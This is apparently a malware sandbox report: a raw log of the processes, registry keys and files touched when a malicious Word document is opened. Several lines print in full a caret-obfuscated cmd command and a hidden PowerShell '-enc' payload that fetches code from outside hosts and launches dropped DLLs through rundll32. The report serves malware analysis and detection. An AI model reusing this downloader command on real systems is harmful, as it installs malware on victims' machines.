Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c...............+..j.....Jq...............u.............}..v.....0......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c..................j.....0................u.............}..v....81......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o...............+..j.....Jq...............u.............}..v.....8......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o..................j.....8................u.............}..v....89......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{...............+..j......................u.............}..v.....@......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{..................j.....@................u.............}..v....8A......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................+..j.....Jq...............u.............}..v.....H......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....H................u.............}..v....8I......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................+..j.....Jq...............u.............}..v.....P......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....P................u.............}..v....8Q......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................+..j.....Jq...............u.............}..v.....X......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....X................u.............}..v....8Y......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............h.{.}.}.$.J.8.2.E.=.(.'.W.'.+.(.'.2.8.'.+.'.L.'.).).....h]......0...............XGq.....4....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.... ^................u.............}..v.....^......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................+..j.....Jq...............u.............}..v....He......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....f................u.............}..v.....f......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................+..j.....Jq...............u.............}..v.....k......0.......................r....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....l................u.............}..v.....m......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ .......+..j.....Jq...............u.............}..v.....p......0...............XGq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....Pq................u.............}..v.....q......0................Gq............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................K..j....E.................u.............}..v............0.................q............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................K..j....E.................u.............}..v...... .....0.................q............................. Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
Source: N00048481397007.doc Virustotal: Detection: 16%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcA
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArAC
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi',JnNGuImBTNGmQ
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye',cGgBEdar
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt',VWMVjHoJWTwKe
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha',GOGZBCfUK
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz',saFFaIU
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe',sKCf
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yorvuovvtuqtxoj\wcvkwfajnrxlso.qcf',HPKSdoSG
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArAC Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi',JnNGuImBTNGmQ Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye',cGgBEdar Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt',VWMVjHoJWTwKe Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha',GOGZBCfUK Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz',saFFaIU Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe',sKCf
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yorvuovvtuqtxoj\wcvkwfajnrxlso.qcf',HPKSdoSG
